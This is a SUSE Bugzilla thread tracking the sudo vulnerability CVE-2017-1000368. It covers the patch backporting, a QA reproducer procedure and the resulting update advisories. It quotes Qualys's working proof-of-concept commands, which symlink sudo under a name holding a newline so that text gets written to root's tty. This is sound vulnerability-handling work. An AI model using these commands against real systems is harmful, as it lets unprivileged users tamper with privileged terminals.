Bugzilla – Bug 1042146
VUL-0: CVE-2017-1000368: sudo: path traversal race conditions, follow up problem
Last modified: 2017-10-25 19:09:30 UTC
Todd Miller of sudo received a secondary report following on bug 1039361. https://www.sudo.ws/pipermail/sudo-announce/2017-May/000155.html Sudo version 1.8.20p2 is now available. This fixes an issue parsing /proc/[pid]/stat on Linux when the process name contains a newline. The bug is not exploitable due to changes in how /dev is traversed made in sudo 1.8.20p1. As we are not using the secondary improved patch but the first one, we might still be affected by this. Can you please check?
The upstream patch from 1.8.20p1 searches recursively only search_devs[]. If a device is not found there, sudo_ttyname_scan() then doesn't descend into directories when it browses the rest of /dev. The patch we use in SLE-12/Leap adds /dev/shm and /dev/mqueue to ignore_devs[]. So when sudo does the BFS /dev scan for the tty device, they aren't searched at all, which prevents the symlink trickery from the Qualys exploit.
On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote: > However, the arbitrary tty access IS exploitable in 1.8.20p1. For example, against Sudo < 1.8.20p1: $ /usr/bin/sudo -l ... User john may run the following commands on localhost: (nobody) /usr/bin/sum $ ln -s /usr/bin/sudo ' 1026 ' (1026 is tty2, currently used by root) $ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' (this is written to root's tty2) Or, against Sudo = 1.8.20p1: $ ln -s /usr/bin/sudo $') 1026 \n' $ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' CVE-2017-1000368 was assigned to this newline vulnerability: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368 With best regards, -- the Qualys Security Advisory team
I can confirm that our packages are vulnerable to this new attack vector.
Created attachment 727965 [details] QA reproducer QA, to reproduce: - Install selinux-policy-minimum - boot with security=selinux selinux=1 enforcing=0 - get the path of the root's terminal with: # tty - now as the sudo user on a different terminal: $ cc CVE-2017-1000368.c -o CVE-2017-1000368 -lutil $ ./CVE-2017-1000368 <PATH_TO_ROOT_TTY> If affected, on the root's tty will appear: /usr/bin/sum: unrecognized option '-- HELLO WORLD ' Try '/usr/bin/sum --help' for more information.
This is already fixed in tumbleweed, the newer patch was already available there so I used that.
(In reply to Simon Lees from comment #5) > This is already fixed in tumbleweed, the newer patch was already available > there so I used that. The "newer patch" (from bug 1039361 comment 23) is just a different approach to fix CVE-2017-100037. This bug (CVE-2017-100038) is fixed by https://www.sudo.ws/repos/sudo/rev/9ad60fe663e5. Anyway, Michael Stroeder fixed Tumbleweed by the update to 1.8.20p2 In home:simotek:branches:OBS_Maintained:sudo/sudo.SUSE_SLE-12-SP2_Update, you're backporting a wrong patch. The one we have there is sufficient to fix CVE-2017-100037, just add the commit mentioned above.
(In reply to Vítězslav Čížek from comment #6) > to fix CVE-2017-100037. > This bug (CVE-2017-100038) is fixed by Sorry, the numbers above should read CVE-2017-1000367 and CVE-2017-1000368 respectively
Kristyna, Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed.
(In reply to Vítězslav Čížek from comment #11) > Kristyna, > Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed. Sudo in SLE-12-SP3 was updated to 1.8.20p2 (sr#134136). It seems that everything is fixed here. Reassigning it back to the security team.
Is version 1.7.X also affected? (SLES 11 SP3 LTSS, for instance) In that case, I'll open a separate bug requesting a PTF. Thanks!
No, both CVE-2017-1000367 and CVE-2017-1000368 affect only the 1.8 branch of sudo. See https://www.sudo.ws/alerts/linux_tty.html Just versions 1.8.5-1.8.20p2 are vulnerable.
SUSE-SU-2017:1626-1: An update that solves one vulnerability and has one errata is now available. Category: security (important) Bug References: 1034560,1042146 CVE References: CVE-2017-1000368 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP2 (src): sudo-1.8.10p3-10.10.2 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): sudo-1.8.10p3-10.10.2 SUSE Linux Enterprise Server 12-SP2 (src): sudo-1.8.10p3-10.10.2 SUSE Linux Enterprise Desktop 12-SP2 (src): sudo-1.8.10p3-10.10.2 OpenStack Cloud Magnum Orchestration 7 (src): sudo-1.8.10p3-10.10.2
SUSE-SU-2017:1627-1: An update that solves one vulnerability and has one errata is now available. Category: security (important) Bug References: 1034560,1042146 CVE References: CVE-2017-1000368 Sources used: SUSE OpenStack Cloud 6 (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server for SAP 12-SP1 (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server for SAP 12 (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server 12-SP1-LTSS (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server 12-LTSS (src): sudo-1.8.10p3-2.16.1
openSUSE-SU-2017:1697-1: An update that solves one vulnerability and has one errata is now available. Category: security (important) Bug References: 1034560,1042146 CVE References: CVE-2017-1000368 Sources used: openSUSE Leap 42.2 (src): sudo-1.8.10p3-9.6.1
released